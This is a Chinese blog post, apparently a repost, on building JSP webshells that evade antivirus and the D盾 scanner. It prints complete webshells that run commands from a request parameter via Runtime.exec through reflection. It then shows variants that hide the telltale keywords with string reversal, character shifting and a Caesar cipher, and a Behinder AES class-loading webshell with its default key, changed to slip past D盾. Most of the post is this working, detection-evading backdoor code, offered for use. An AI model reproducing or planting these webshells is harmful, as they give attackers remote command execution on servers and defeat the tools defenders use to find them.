webshell之jsp免杀

最新推荐文章于 2024-03-02 22:47:58 发布
最新推荐文章于 2024-03-02 22:47:58 发布
阅读量2.4k 收藏 6
点赞数
文章标签: java jsp servlet 反射 struts2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tomyyyyyy/article/details/121571939
版权

webshell之jsp免杀

转载自webshell免杀研究

原理

向服务器端发送恶意代码写成的文件(即:shell),客户端通过远程连接,利用shell连接到服务器,并可对服务器进行操作。

结构

实现三步

  1. 数据的传递
  2. 执行所传递的数据
  3. 回显

数据传递

String x = request.getParameter("x");

执行所传递的数据

Class rt = Class.forName("java.lang.Runtime");
Method gr = rt.getMethod("getRuntime");  //获取getRuntime方法
Method ex = rt.getMethod("exec", String.class);  //获取exec方法
Process e = (Process) ex.invoke(gr.invoke(null),  x);

回显

#in为执行返回结果
int a=-1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
    out.println(new String(b));
}
out.print("</pre>");

免杀思路

jsp类型webshell数据传入、回显两个部分都是很正常的代码,一般程序中都会使用,不会触发检测规则。

所以需要重点关注杀毒软件对执行这个部分的检测

免杀

将以上三个部分拼接出来就是正常的通过类反射执行的回显webshell:

<%@ page contentType="text/html;charset=UTF-8"  language="java" %>
<%@ page import="java.lang.reflect.Method"%>
<%
String x = request.getParameter("x");
if(x!=null){
	Class rt = Class.forName("java.lang.Runtime");
	Method gr = rt.getMethod("getRuntime");  //获取getRuntime方法
    Method ex = rt.getMethod("exec", String.class);  //获取exec方法
	Process e = (Process) ex.invoke(gr.invoke(null),  x);
	java.io.InputStream in = e.getInputStream();
	int a = -1;
	byte[] b = new byte[2048];
	out.print("<pre>");
	while((a=in.read(b))!=-1){
		out.println(new String(b));
	}
	out.print("</pre>");
}
%>

由于其仍然含有java.lang.Runtime、getRuntime、exec等关键字,仍然会被安全软件检测,我们的免杀主要也针对这几个关键字符串。

比如通过ascii、hex、base64等方式传入不含有这些特征的关键字,但是因为用的过多,目前也被列入已知后门,所以最好这里是自定义编码方式或转换方式,比如异或,移位,反转,栅栏等各种操作缝合的方式。

反转字符串

<%@ page contentType="text/html;charset=UTF-8"  language="java" %>
<%@ page import="java.lang.reflect.Method"%>
<%!public static String reverseStr(String str){String reverse = "";int length = str.length();for (int i = 0; i < length; i++){reverse = str.charAt(i) + reverse;}return reverse;}%>
<%
String x = request.getParameter("x");
if(x!=null){
	Class rt = Class.forName(reverseStr("emitnuR.gnal.avaj"));
	Method gr = rt.getMethod(reverseStr("emitnuRteg"));
    Method ex = rt.getMethod(reverseStr("cexe"), String.class);
	Process e = (Process) ex.invoke(gr.invoke(null),  x);
	java.io.InputStream in = e.getInputStream();
	int a = -1;
	byte[] b = new byte[2048];
	out.print("<pre>");
	while((a=in.read(b))!=-1){
		out.println(new String(b));
	}
	out.print("</pre>");
}
%>

移位5位

<%@ page contentType="text/html;charset=UTF-8"  language="java" %>
<%@ page import="java.lang.reflect.Method"%>
<%!public static String eStr(String str){String result = "";int length = str.length();for (int i = 0; i < length; i++){char z=str.charAt(i);z=(char)(z-5);result=result+z;}return result;}%>
<%
if(request.getParameter("x")!=null){Class rt = Class.forName(eStr("of{f3qfsl3Wzsynrj"));
Process e = (Process) rt.getMethod(new String(eStr("j}jh")), String.class).invoke(rt.getMethod(new String(eStr("ljyWzsynrj"))).invoke(null, new Object[]{}), request.getParameter("x") );
java.io.InputStream in = e.getInputStream();int a = -1;byte[] b = new byte[2048];
out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b));}out.print("</pre>");}
%>

小写字母凯撒密码

<%@ page contentType="text/html;charset=UTF-8"  language="java" %>
<%@ page import="java.lang.reflect.Method"%>
<%!public static String plusStr(String str){String plus = "";int length = str.length();for (int i = 0; i < length; i++){char z = str.charAt(i);
if(z>='a'&&z<='w'){z=(char)(z+3);plus=plus+z;}
else if(z>='x'&&z<='z'){z=(char)(z-23);plus=plus+z;}
else{plus=plus+z;}}return plus;}
%>
<%
String x = request.getParameter("x");
if(x!=null){
	Class rt = Class.forName(plusStr("gxsx.ixkd.Rrkqfjb"));
	Method gr = rt.getMethod(plusStr("dbqRrkqfjb"));
    Method ex = rt.getMethod(plusStr("bubz"), String.class);
	Process e = (Process) ex.invoke(gr.invoke(null),  x);
	java.io.InputStream in = e.getInputStream();
	int a = -1;
	byte[] b = new byte[2048];
	out.print("<pre>");
	while((a=in.read(b))!=-1){
		out.println(new String(b));
	}
	out.print("</pre>");
}
%>

冰蝎改造

冰蝎默认马:

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
<%!class U extends ClassLoader{U(ClassLoader c){super(c);}
public Class g(byte []b){return super.defineClass(b,0,b.length);}}%>
<%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);
Cipher c=Cipher.getInstance("AES");
c.init(2,new SecretKeySpec(k.getBytes(),"AES"));
new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

经过二分法,D盾查杀特征在最后这句

new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);

参考了yzddmr6的方法,拆分或使用类似语句替换,所以使用Base64.getDecoder()替换原本特征,并把request.getReader().readLine()单独取出来,破坏D盾识别的特征。当然也可以拆分该语句的其他部分,破坏特征。

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
<%!class U extends ClassLoader{U(ClassLoader c){super(c);}
public Class g(byte []b){return super.defineClass(b,0,b.length);}}%>
<%if (request.getMethod().equals("POST")){
String k="e45e329feb5d925b";
session.putValue("u",k);
Cipher c=Cipher.getInstance("AES");
c.init(2,new SecretKeySpec(k.getBytes(),"AES"));
String input= request.getReader().readLine();
new U(this.getClass().getClassLoader()).g(c.doFinal(Base64.getDecoder().decode(input))).newInstance().equals(pageContext);
}%>

最终D盾对本文提到的多种webshell都是可以免杀的

img

tomyyyyy
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
webshell一句话
08-26
php,jsp,asp等脚本的常用一句话拿webshell,然后用菜刀连接即可
JSP免杀
hackzkaq的博客
10-20 431
针对PHP可通过监测核心的eval函数进行查杀,但是JSP的查杀目前还没有很好的监测办法,除上述的利用进行免杀外,还可通过创建Runtime的父类等方式。笔者水平有限,欢迎大家指出问题。`m 9`竟然是敏感词,我把文中的换成了@@@,大家自行替换即可。原文地址:https://www.freebuf.com/articles/web/355975.html。
过d盾 jsp webshell+冰蝎免杀探讨
goddemon
07-19 2293
jsp免杀的思路其实一般最常用的就是反射和类加载问题+反转问题就能bypasswebshell的查杀了当然现在的有些厂商直接强标识这种就要el去绕咯。
jsp webshell 初识
最新发布
weixin_50217210的博客
03-02 377
访问得到os.name的信息 代码中可以接收参数cmd 我们提供参数看看 cmd=ipconfig。没问题这里(只是我测试的时候没有处理图片,就不放置了)很有可能是字节输出的代码被检测到了,我们删除了看一下。果然,删除以后检测不到了,那我们想办法绕过。之前是执行exec参数,这次是可疑文件。放到IDEA中webapp下测试一下。在D盾跑还是被检测到了,换一种方式输出字节流。
webshell连接工具冰蝎检测特征提取
TKMoma
09-09 8837
1⃣️、概述         冰蝎作为新款的webshell连接工具,使用效果非常好。本文主要从冰蝎使用过程产生的流量里提取检测特征。部分提取思路从基于流量侧检测冰蝎webshell交互通讯获得了启发。后经过测试发现了关于冰蝎工具的通用检测特征(针对目前已公开的版本)。下面详细介绍本文内容。 2⃣️、各版本对比 &nb...
tomcat下jsp shellwebshell
夜行者~@
11-10 8558
首先要了解,什么是服务器,什么是web,服务器就是和电脑一样的,有操作系统,操作系统与磁盘,网卡,内存等等组合起来的就叫服务器,web内,是服务器上面的一个应用,tomcat就是一个应用,可以解析jsp文件,tomat运行之后,丢jsp进去,可以上解析jsp文件,tomcat运行之后java sdk以及运行,jsp可以条用java sdk api,java api可以条用系统shell,这样就形...
最新免杀webshell
07-21
webshell 过世界杀软。带防删功能。提权加强版。
轻松玩转WEB安全
02-08
本课程会介绍web安全基础知识,通过实际操作解释技术原理,巩固学习成果。模拟多种实战场景,结合技术讲解,传授对抗WAF的经验,定制自己的免杀webshell,带你深刻理解不同实战下的渗透思路。对技术要点进行总结,并且介绍自己的奇淫技巧,发现新的漏洞挖掘技术方向,帮助各位同学高效挖洞获取奖金。
Webshell免杀-JSP
qq_55787787的博客
10-15 2758
JSP免杀的基本免杀方式。
JSP webshell免杀——webshell免杀
weixin_46601374的博客
06-29 3357
好搞笑,我身边的人省护期间天天提到许少,听说是一个很厉害的大佬。结果我免杀跟着学的视频就是这位大佬的。更离谱的是,聪哥说我们是见过许少的,就是上次给红队整理报告的时候,他就在。果然,实习就是好,传说中的大佬们就在身边——虽然我都不认识,但是还是感觉好厉害。来吧,开始学习免杀首先就是最简单的一句话木: 太容易被发现了而且在我写代码的时候电脑的病毒和威胁防护就已经开始反应了现在将这一句话木,分开来写 沙箱是通过了✌但是cmd=ipconfig是什么都不出的,netstat -ano也是。 再次修改代码中间
JSP Webshell 免杀
悦分享
08-01 1590
上面提到JSP在第一次运行的时候会先被Web容器,如Tomcat翻译成Java文件,然后才会被Jdk编译成为Class加载到jvm虚拟机中运行。JDK在编译的时候只看java文件的格式是否正确。而Tomcat在翻译JSP的不会检查其是否合乎语法。...
特征码免杀webshell
05-04
特征码免杀webshell免杀性能好。稳定性强这个是非常好的一份开源代码。
源码免杀webshell
05-04
源码免杀webshell免杀性能好。稳定性强这个是非常好的一份开源代码。
jspwebshell.txt
04-07
jspwebshell.txt
甲壳虫免杀webshell
04-25
甲壳虫免杀webshell,免杀性能好。稳定性强
华夏免杀webshell
08-13
webshell webshell webshell webshell
JSP webshell免杀——JSP的基础
weixin_46601374的博客
06-29 1655
唉,每次开启JSP都要好一会儿。话说我也不知道为啥,我的每次开启条件一次比一次苛刻。一开始必应就可以打开,再后来只能由谷歌打开,现在可好了得开着代理用谷歌才能进去。在标记符号之间声明变量,定义方法以及定义类。 标记符号的内容习惯上放在JSP 页面指令之后,之前,也可以写在与之间。之间声明的变量在整个JSP页面内都有效,与标记符在JSP页面中所在的书写位置无关,但习惯上把 标记符写在JSP页面的前面。●一个JSP页面可以...
Web安全】JSP内存研究
HBohan的博客
10-19 573
前言 最近在研究webshell免杀的问题,到了内存免杀部分发现传统的Filter或者Servlet查杀手段比较多,不太容易实现免杀,比如有些工具会将所有注册的Servlet和Filter拿出来,排查人员仔细一点还是会被查出来的,所以 我们要找一些其他方式实现的内存。比如我今天提到的JSP的内存(虽然本质上也是一种Servlet类型的) 。 【学习资料】 JSP加载流程分析 在Tomcat中jspjspx都会交给JspServlet处理,所以要想实现JSP驻留内存,首先得分析JspServlet.
免杀一句话
cc1988429的专栏
04-18 2363
0x01:ASP一句话 1. 2. 3. 0x02:免杀大部分网站的一句话 4. 0x03:免杀部分网站过略的一句话 5.executerequest("x") 0x04:免杀部分网站过略双引号的一句话 6. 0x05:php一句话 7. 0x06:aspx一句话 8. WebAdmin2Y.x.y aaaaa = newWebAdmin2Y.x.y("x");
webshell免杀
03-16
WebShell 免杀指的是让 WebShell 在网站管理员或安全软件扫描时不被检测到或误判为恶意软件。这可以通过混淆、加密或隐藏 WebShell 的代码来实现。但是需要注意的是,这并不能保证 WebShell 不会被发现或清除,并且使用 WebShell 也是非法的。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值